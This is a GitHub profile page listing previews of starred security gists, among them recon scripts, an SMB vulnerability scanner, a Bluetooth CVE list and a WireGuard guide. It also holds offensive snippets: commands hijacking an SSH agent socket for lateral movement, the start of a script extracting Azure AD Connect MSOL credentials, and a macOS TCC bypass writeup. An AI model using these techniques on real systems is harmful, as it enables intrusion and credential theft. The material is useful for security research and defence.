Skip to content

Instantly share code, notes, and snippets.

View star-bob's full-sized avatar

Bob of DevOps star-bob

51 followers · 626 following
  • LITFA
  • In your house!!
View GitHub Profile
@benpturner
benpturner / GetAadJoinInformation.cs
Created April 20, 2021 19:37
GetAadJoinInformation C# Module
using System;
using System.Collections.Generic;
using System.Management;
using System.DirectoryServices;
using System.DirectoryServices.ActiveDirectory;
using System.Text;
using System.Runtime.Serialization.Formatters.Binary;
using System.IO;
using System.Collections;
using System.Runtime.InteropServices;
@int0x80
int0x80 / SSH Agent Forwarding.md
Created January 7, 2021 00:59

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld

user@internal:~$ hostname -f
internal.company.tld
@theevilbit
theevilbit / download_apple_tarballs.sh
Last active July 2, 2021 02:38
Download tarballs from https://opensource.apple.com/
wget --no-check-certificate --recursive --domains=opensource.apple.com --no-clobber --accept "*.gz" --no-parent -l2 https://opensource.apple.com/tarballs
wget --no-check-certificate --recursive --domains=opensource.apple.com --no-clobber --accept "*.gz" -l2 https://opensource.apple.com/
wget --no-check-certificate --recursive --domains=opensource.apple.com --no-clobber --accept "*.gz" --no-parent -l3 https://opensource.apple.com/darwinbuild/
@theevilbit
theevilbit / _obs_tcc.md
Last active August 3, 2021 22:14
[StreamLabs OBS macOS TCC bypass]

StreamLabs OBS macOS TCC bypass

The Streamlabs macOS thick client does have hardened runtime enabled, but specifically allows DYLD environment variables and also disables library validation, which kills the purpose of hardened runtime. Having these settings on the executable enables an attacker to inject custom DYLIB libraries into the application. This would allow an attacker to access data inside the app, and possibly gain persistence on a machine, beyond that, as StreamLabs has access to the microphone and camera a user would gain access to that once exploited.

We can see the wrong permissions with running the codesign utility:

csaby@bigsur ~ % codesign -dv --entitlements :- /Applications/Streamlabs\ OBS.app 
Executable=/Applications/Streamlabs OBS.app/Contents/MacOS/Streamlabs OBS
Identifier=com.streamlabs.slobs
Format=app bundle with Mach-O thin (x86_64)
@tdec
tdec / gist:128751d818e9753364a72086b961390b
Last active June 23, 2023 20:41
Bluetooth vulnerabilities
Vulnerabilities published by Bluetooth SIG, Android, Apple, Intel and Qualcomm security bulletins, published at security conferences or as master thesis. If any are missing, thanks for pointing me to them !
Todo: macOS
Year | Name | CVE
2020 | Blurtooth: Exploiting Cross-Transport Key Derivation | 2020-15802
2020 | Pairing Method Confusion | 2020-10134
2020 | BIAS: Bluetooth Impersonation Attacks | 2020-10135
2020 | BlueRepli | ?
2020 | BLESA: Bluetooth Low energy spoofing attacks | 2020-9770
@mpgn
mpgn / Blackfield vs NetExec .md
Last active April 17, 2024 15:02
Blackfield vs NetExec for fun and profit @mpgn_x64
@qdm12
qdm12 / README.md
Last active October 27, 2025 17:44
Wireguard and iptables restrictions for multiple users

Wireguard and iptables restrictions for multiple users

If you don't know what Wireguard is, well, you should. It's fast, easy to setup and highly configurable. We will configure Wireguard for multiple users with various restrictions using iptables.

Assumptions

This should fit most setups (not mine though 😉)

@xpn
xpn / azuread_decrypt_msol_v2.ps1
Last active July 30, 2025 13:07
Updated method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync
Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)"
Write-Host "`t[ Updated to support new cryptokey storage method ]`n"
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync2019;Initial Catalog=ADSync"
try {
$client.Open()
} catch {
Write-Host "[!] Could not connect to localdb..."
return
@payloadartist
payloadartist / firefox.sh
Last active February 6, 2021 20:42
Enumerate sub-domains, then open them in Firefox automatically. Useful for taking a quick glance at target's assets, and make notes, while doing recon.
# ------Instructions---------
# Install (and configure) subfinder, assetfinder, and httprobe
# go get -v github.com/projectdiscovery/subfinder/cmd/subfinder && go get -v github.com/tomnomnom/httprobe && go get -v github.com/tomnomnom/assetfinder
# cat firefox.sh >> ~/.bashrc
# source ~/.bashrc
# Usage - subf_ff target.tld
# asset_ff target.tld
subf_ff () {
subfinder -d $1 -silent -t 100 | httprobe -c 50 | sort -u | while read line; do firefox $line; sleep 10; done
@nikallass
nikallass / check-smb-v3.11.sh
Created March 11, 2020 04:57
CVE-2020-0796. Scan HOST/CIDR with nmap script smb-protocols.nse and grep SMB version 3.11.
#!/bin/bash
if [ $# -eq 0 ]
then
echo $'Usage:\n\tcheck-smb-v3.11.sh TARGET_IP_or_CIDR'
exit 1
fi
echo "Checking if there's SMB v3.11 in" $1 "..."
nmap -p445 --script smb-protocols -Pn -n $1 | grep -P '\d+\.\d+\.\d+\.\d+|^\|.\s+3.11' | tr '\n' ' ' | replace 'Nmap scan report for' '@' | tr "@" "\n" | grep 3.11 | tr '|' ' ' | tr '_' ' ' | grep -oP '\d+\.\d+\.\d+\.\d+'